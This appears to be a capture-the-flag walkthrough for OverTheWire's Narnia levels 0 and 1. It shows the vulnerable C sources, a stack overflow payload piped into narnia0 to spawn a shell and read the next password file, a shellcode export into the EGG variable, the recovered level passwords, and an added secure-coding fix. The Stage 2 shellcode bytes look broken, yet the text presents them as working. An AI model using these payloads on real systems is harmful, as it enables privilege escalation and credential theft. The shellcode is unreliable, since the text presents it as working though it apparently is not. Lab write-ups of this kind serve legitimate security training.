Online capture-the-flag challenge site
http://overthewire.org
Narnia setup
http://overthewire.org/wargames/narnia/
SSH login: narnia.labs.overthewire.org
Port: 2226
Account: narnia0, narnia1, narnia2... and so on
Password: narnia0, narnia1, narnia2... and so on
Stage 1:
Commands:
cd /narnia
View the C source file
cat narnia0.c
/*
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include <stdio.h>
#include <stdlib.h>
int main(){
    long val=0x41414141; // 0x41 = 'A', 0x42 = 'B'; at most 24 bytes can be entered
    char buf[20];
    printf("Correct val's value from 0x41414141 -> 0xdeadbeef!\n");
    printf("Here is your chance: ");
    scanf("%24s",&buf);
    printf("buf: %s\n",buf);
    printf("val: 0x%08x\n",val);
    if(val==0xdeadbeef){
        setreuid(geteuid(),geteuid());
        system("/bin/sh");
    }
    else {
        printf("WAY OFF!!!!\n");
        exit(1);
    }
    return 0;
}
Run the compiled narnia0 program
Command:
./narnia0
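At most 24 bytes can be entered. After entering 20 A's followed by 4 B's, val becomes 0x42424242 (BBBB), which shows that the overflow is exploitable.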
Change the value to 0xdeadbeef:
Command: python -c 'print "A"*20 + "\xef\xbe\xad\xde"' | ./narnia0
The value has been written successfully. The next step is to run a shell command: if val matches 0xdeadbeef, /bin/sh is invoked.
Command:
(python -c 'print "A"*20 + "\xef\xbe\xad\xde"'; echo 'cat /etc/narnia_pass/narnia1') | /narnia/narnia0
Password obtained successfully: efeidiedae
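The overflow above exists because the scanf width (24, plus a terminating NUL) is larger than the 20-byte buf. As an added example, not part of the original post or the wargame source, here is a bounded read whose width is tied to the buffer size and which rejects over-long input instead of truncating it. The names struct frame, read_bounded and val_after_page_input are hypothetical, and the struct is a constructed stand-in for the stack layout.

```c
#include <ctype.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed stand-in for narnia0's locals: buf with val placed right after it. */
struct frame {
    char     buf[20];
    uint32_t val;
};

#define STR_(x) #x
#define STR(x)  STR_(x)
#define BUF_MAX 19   /* sizeof(buf) - 1, leaves room for the terminating NUL */

/* Hypothetical helper: read one token, never writing past buf.
 * Returns token length, or -1 if the token would not fit (rejected, not truncated). */
int read_bounded(const char *input, struct frame *f)
{
    int consumed = 0;

    _Static_assert(sizeof(f->buf) == BUF_MAX + 1, "width must match buffer size");
    if (sscanf(input, "%" STR(BUF_MAX) "s%n", f->buf, &consumed) != 1)
        return -1;
    /* If a non-space byte follows, the token was longer than the buffer. */
    if (input[consumed] != '\0' && !isspace((unsigned char)input[consumed])) {
        memset(f->buf, 0, sizeof(f->buf));
        return -1;
    }
    return (int)strlen(f->buf);
}

/* Feeds the page's 24-byte input (20 'A' + ef be ad de) and returns val afterwards. */
uint32_t val_after_page_input(void)
{
    struct frame f = { .buf = {0}, .val = 0x41414141u };
    const char input[] = "AAAAAAAAAA" "AAAAAAAAAA" "\xef\xbe\xad\xde";

    (void)read_bounded(input, &f);
    return f.val;
}

int main(void)
{
    printf("val: 0x%08x\n", (unsigned)val_after_page_input());
    return 0;
}
```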
Stage 2
Log in to the system with the narnia1 account
Source code
/*
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include <stdio.h>
int main(){
    int (*ret)(); // function pointer; it is called at whatever address is stored in ret
    if(getenv("EGG")==NULL){ // reads the environment variable EGG; its value is stored in ret below
        printf("Give me something to execute at the env-variable EGG\n");
        exit(1);
    }
    printf("Trying to execute EGG!\n");
    ret = getenv("EGG");
    ret();
    return 0;
}
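If shellcode is stored in the environment variable EGG, it will be executed whatever its contents are. Simply use shellcode that runs /bin/sh and assign it to the EGG environment variable.
Command: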
export EGG=`python -c 'print "\x31\xc0\x58\x2f\x62\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0"'`
Password: nairiepecu
To be continued!!!